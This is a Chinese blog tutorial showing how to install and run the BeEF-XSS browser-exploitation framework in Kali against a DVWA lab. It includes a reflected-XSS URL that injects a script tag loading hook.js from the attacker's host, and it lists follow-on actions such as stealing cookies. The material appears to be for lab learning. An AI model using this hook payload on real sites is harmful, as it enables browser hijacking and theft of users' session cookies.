2021Kali系列 -- XSS漏洞(Beef-xss) - Kirin博客

2021Kali系列 -- XSS漏洞(Beef-xss)

作者: A.毒蜂

全网最全的网络资源分享网站

标签:

xsskali

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

kirin博客

简介:BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能!


一、安装beef-xss

输入beef-xss,提示安装,输入y


二、启动beef-xss


三、访问登陆页面:

http://192.168.139.133:3000/ui/panel


四、让目标主机访问存在生成的钩子代码

http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.133:3000/hook.js"></script>


五、获取控制权限

绿色模块:表示模块适用当前用户,并且执行结果对用户不可见

红色模块:表示模块不适用当前用户,有些红色模块也可以执行

橙色模块:模块可用,但结果对用户可见

灰色模块:模块为在目标浏览器上测试过

1、获取cookies

2、获取网页源码

3、让目标主机弹出提示信息



禁止非法,后果自负

分享到:
加入交流群
未经允许不得转载:

作者: A.毒蜂, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《2021Kali系列 -- XSS漏洞(Beef-xss)》 发布于2021-4-17

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫